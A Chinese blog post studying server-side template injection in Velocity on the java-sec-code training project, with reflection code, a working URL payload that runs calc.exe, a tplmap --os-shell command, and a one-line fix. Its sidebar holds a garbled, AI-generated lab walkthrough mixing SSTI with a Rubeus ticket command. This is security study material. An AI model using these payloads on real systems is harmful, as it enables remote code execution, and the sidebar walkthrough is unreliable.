java-sec-code学习之SSTI

最新推荐文章于 2024-06-15 19:45:33 发布
最新推荐文章于 2024-06-15 19:45:33 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: Java代码审计 文章标签: java 反射 spring 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanmiqi/article/details/119658348
版权

前言

项目是java-sec-code:https://github.com/JoyChou93/java-sec-code
SSTI,又称作模板注入,之前接触过python中flask的ssti模板注入,最终能达到rce,不过实战中比较少吧,php中比如smarty也会有相应的ssti模板注入。刚好今天来学习下java下的ssti。

0x01 从java代码出发

进入controller文件
/src/main/java/org/joychou/controller/SSTI.java

1

发现java使用的是Velocity来进行渲染模板,Velocity是一个基于java的模板引擎,样例上说明,即使是最新版本的Velocity,如果使用evaluate来进行渲染模板,仍然会有此漏洞。

简单分析下代码:
28行初始化Velocity
30行创建一个存放Velocity内容的对象
32、33、34行通过键值对的方式添加内容
36行创建一个StringWrite对象,在字符串缓冲区中收集输出的字符流。
37行使用Velocity.evaluate方法

当用户可以指定模板时,也就是evaluate中模板可控,可造成rce。通过设置一个字符串,然后通过获取字符串的类去寻找Runtime类,再去寻找getRuntime反射方法达到命令执行。

java反射机制达到命令执行:
2

public class test_class {
    public static void main(String[] args) throws Exception{
        String test = "e";
        test.getClass().forName("java.lang.Runtime").getMethod("exec",String.class).invoke(
                String.class.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(
                        String.class.getClass().forName("java.lang.Runtime")
                ),new String[]{"calc.exe"}
        );
    }
}

payload

velocity?template=%23set($e="e");$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc.exe")

注意:上面的%23并不能直接url解码换成#

即可在windows上弹出计算器,测试其他命令均可执行,只不过没有相应的回显。
3

组合拳:在linux上可以考虑反弹bash、windows上可以考虑远程下载程序执行或者用powershell来反弹shell。

常用工具
使用https://github.com/epinna/tplmap工具进行 SSTI,一般常见没有过滤的SSTI都能使用。

git clone https://github.com/epinna/tplmap
python tplmap.py --os-shell -u 'http://localhost:8080/ssti/velocity?template=aa'

0x02 修复

不使用evaluate方法(也不常见)。

参考:
java反射rce:http://rui0.cn/archives/1015
官方文档: https://github.com/JoyChou93/java-sec-code/wiki/SSTI

ISMidi
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssti-payload:SSTI有效载荷生成器
02-06
该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1607
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
SSTI——java里的ssti
wwwwyyyrre的博客
06-08 556
因为从来没接触过java语言 所以对这些也是基本上一窍不通 这里只简单的提及 不做具体介绍会找一下题来做 但是没有找到有关java ssti的题目。
Java SSTI服务端模版注入漏洞原理与利用
最新发布
道阻且长,行则将至。
06-15 1220
本文通过具体的漏洞实例代码,分析、总结了 Java 项目常见的三大模板引擎(Velocity、FreeMarker、Thymeleaf)的 SSTI 漏洞原理与利用方法。虽然相应的模板引擎 SSTI 注入漏洞基本上都拥有 CVE 编号和安全版本,当时在开发人员错误引入存在漏洞缺陷的模板引擎版本的情况下,目标系统依旧存在 RCE 风险。
SSTI(模块注入)的简单学习
dbabs的博客
02-05 651
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
[Java-sec-code]Java velocity SSTI
Y4tacker的博客
07-25 1006
文章目录Java velocity Java velocity 可以看一看这一篇文章 java velocity模板用法(替换、循环、if判断)
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 1748
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
完整的Java代码审计学习笔记资源(免费下载)
10-31
java代码审计-ssti.md 第一的 4年前 java代码审计-xss.md 第一的 4年前 java代码审计-xxe.md 第一的 4年前 java代码审计-反序列化.md 添加一些关于 jndi 的内容 3年前 java代码审计-命令执行.md 第一的 4年前 java...
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。 同步更新于: 01月29日更新: 新收录文章 mysql MSSQL postgresql 前端安全 php java-Web redis SSTI 信息搜集 渗透 Web-...
CTF-WEB入门DOC-2019版1
08-03
6. Python漏洞:研究Flask SSTI、pickle反序列化等。 7. XXE:理解XXE漏洞原理,通过xxe-lab实践。 8. Java漏洞:掌握Java反序列化漏洞。 9. JavaScript漏洞:了解Node.js安全,如常见漏洞和反序列化问题。 五、...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
scant3r:ScanT3r-网络安全扫描仪
03-16
Scant3r-Web应用程序漏洞扫描程序为什么要使用Scant3r? scant3r将帮助您更快地编写自己的python脚本,无需配置http / threads / errors / options / etc ...,只需在脚本中编写main函数,即可在终端中运行它或访问...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入(SSTI)1
07-25
Apache OfBiz 服务器端模板注入(SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行
WEB攻防-Java安全&SPEL表达式&SSTI模版注入&XXE&JDBC&MyBatis注入
siu~
12-08 709
#知识点: 1、Java安全-SQL注入-JDBC&MyBatis 2、Java安全-XXE注入-Reader&Builder 3、Java安全-SSTI模版-Thymeleaf&URL 4、Java安全-SPEL表达式-SpringBoot框架
服务端模板注入(SSTI)上
why811的博客
07-18 749
在handleCache内,首先判断有没有开启options.cache此值默认为空,所以没有进去if区间,然后在elseif处判断了hasTemplate的值是否为空,此值的定义是从arguments.length得到的,所以此值不为空,也没有进入到elseif区间内,然后就到了exports.compile处,这里在调用compile方法时把模板传入,继续跟踪此方法。内建函数很像子变量(也像Java中的方法),它们并不是数据模型中的东西,是Freemarker在数值上添加的。
学习笔记-java代码审计-ssti
人饭子的博客
11-13 466
java代码审计-ssti 0x01漏洞挖掘 Velocity @RequestMapping("/ssti/velocity") public String velocity(@RequestParam(name = "content") String content) { Velocity.init(); VelocityContext velocityContext = n...
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限,你可以使用SSTI有效载荷发生器来执行特定类型的Java SSTI攻击。该有效载荷发生器可以生成针对Java SSTI的payload,启发于${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)...}。 4. 另外,你还可以使用Rubeus工具来申请访问自身的可转发服务票据。通过运行命令".\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:bd2cf5e6a8f89ed5b02d3d7fcf5e88c7 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt",你可以生成一个可转发的服务票据文件,以便在后续攻击中使用。 通过以上步骤,你可以成功通关ssti-lab靶场。请注意,在进行任何攻击前,确保你有合法的授权和使用权,并且遵守法律法规。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [WP-春秋云镜-Brute4Road靶场通关完全指南](https://blog.csdn.net/qq_45234543/article/details/128482984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [ssti-payload:SSTI有效载荷生成器](https://download.csdn.net/download/weixin_42128558/15099898)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值